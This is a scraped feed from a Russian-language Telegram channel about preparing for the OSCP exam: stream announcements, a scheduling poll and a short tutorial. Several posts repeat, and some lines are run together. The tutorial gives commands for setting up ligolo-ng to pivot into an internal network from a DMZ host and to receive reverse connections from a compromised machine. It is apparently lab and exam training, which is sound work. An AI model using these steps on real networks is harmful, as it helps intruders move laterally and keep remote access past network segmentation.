🔥15
Всем привет!
Возникли проблемы с микрофоном. Сейчас постараюсь устранить и мы начнем.
Прошу прощения за форс-мажор🙏🏻☺️
Возникли проблемы с микрофоном. Сейчас постараюсь устранить и мы начнем.
Прошу прощения за форс-мажор🙏🏻☺️
❤14
Большое спасибо всем, кто пришел сегодня на стрим!🙏🏻
Надеюсь, получилось полезно и интересно. Будем дальше работать и развивать это направление, следите за анонсами💻
P.S. Всех, кого мучил вопрос: на заднем плане храпел наш пес😂
Надеюсь, получилось полезно и интересно. Будем дальше работать и развивать это направление, следите за анонсами💻
P.S. Всех, кого мучил вопрос: на заднем плане храпел наш пес😂
🔥24
Всем привет!
В эти выходные продолжим решать уязвимые виртуальные машины в онлайне и готовиться к OSCP. Опрос будет ниже. Жду каждого из вас 💻🙏🏻
В эти выходные продолжим решать уязвимые виртуальные машины в онлайне и готовиться к OSCP. Опрос будет ниже. Жду каждого из вас 💻🙏🏻
🔥16😍4👍3
❤🔥17
ligolo-ng или как принять бэк коннект из внутренней сети❓💻
Давайте смоделируем ситуацию, в которой нам необходимо туннелировать трафик не только во внутреннюю сеть, но и из нее. Когда это необходимо спросите вы? Например, мы имеем RCE на внутренней машине (DB01) (см.схему сети) и хотим принять бэк коннект на нашу kali. Очевидно, используя стандартные способы туннелирования, например, chisel, сделать это не удастся. В таком случае, можно использовать утилиту ligolo-ng. Почитать описание и функциональность можно самостоятельно. Я коротко расскажу как ее настроить и работать.
Необходимо загрузить прокси. Прокси ставится на наш Linux (kali). Создаем интерфейс для него и активируем:
Далее разберемся, как же нам передать файл или получить бэк коннект. На нашей kali (в прокси) выполняем следующую команду:
Забирай и пользуйся!😉
Давайте смоделируем ситуацию, в которой нам необходимо туннелировать трафик не только во внутреннюю сеть, но и из нее. Когда это необходимо спросите вы? Например, мы имеем RCE на внутренней машине (DB01) (см.схему сети) и хотим принять бэк коннект на нашу kali. Очевидно, используя стандартные способы туннелирования, например, chisel, сделать это не удастся. В таком случае, можно использовать утилиту ligolo-ng. Почитать описание и функциональность можно самостоятельно. Я коротко расскажу как ее настроить и работать.
Необходимо загрузить прокси. Прокси ставится на наш Linux (kali). Создаем интерфейс для него и активируем:
sudo ip tuntap add user kali mode tun ligoloПосле того как добавили интерфейс, запускаем прокси:
sudo ip link set ligolo up
./ligolo_proxy -selfcertИдем на DMZ и подключаемся к нашему прокси (порт 11601 является портом по умолчанию):
ligolo_agent.exe -connect 192.168.45.220:11601 -ignore-certОтлично, мы установили коннект между сервером и агентом, но туннеля еще нет. Мы должны добавить маршрут до внутренней сети:
sudo ip route add 10.10.77.0/24 dev ligoloПосле этого идем в kali, выбираем нужную сессию (sessions) и выполняем:
startОтлично. Теперь мы имеем возможность обращения ко внутренним хостам сети.
Далее разберемся, как же нам передать файл или получить бэк коннект. На нашей kali (в прокси) выполняем следующую команду:
listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:5678Теперь весь трафик с хоста DMZ, который приходит на порт 1234, будет идти на kali в 5678.
Забирай и пользуйся!😉
ImgBB
image hosted at ImgBB
Image image hosted on ImgBB
👍12🤩3❤1🔥1
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥153👍25❤7🎉6❤🔥3⚡2
Всем привет!
Поступали просьбы рассказать как прошел экзамен, оценить собственную подготовку и провести некоторую ретроспективу.
Предлагаю осуществить это в ближайшие выходные. Сделаем ставки в опросе и соберемся.
Буду рад видеть каждого!🙂
Поступали просьбы рассказать как прошел экзамен, оценить собственную подготовку и провести некоторую ретроспективу.
Предлагаю осуществить это в ближайшие выходные. Сделаем ставки в опросе и соберемся.
Буду рад видеть каждого!
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11❤2🔥2
OSCP ретро
Anonymous Poll
24%
СБ (18.11) 14 - 16 (мск)
30%
СБ (18.11) 16 - 18 (мск)
26%
ВС (19.11) 14 - 16 (мск)
50%
ВС (19.11) 16 - 18 (мск)
👍3
Учитывая результаты голосования, предлагаю провести нашу встречу завтра в 16:00 (мск). Готовьте ваши вопросы😎
P.S. Запись встречи, разумеется, будет!
P.S. Запись встречи, разумеется, будет!
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11🔥7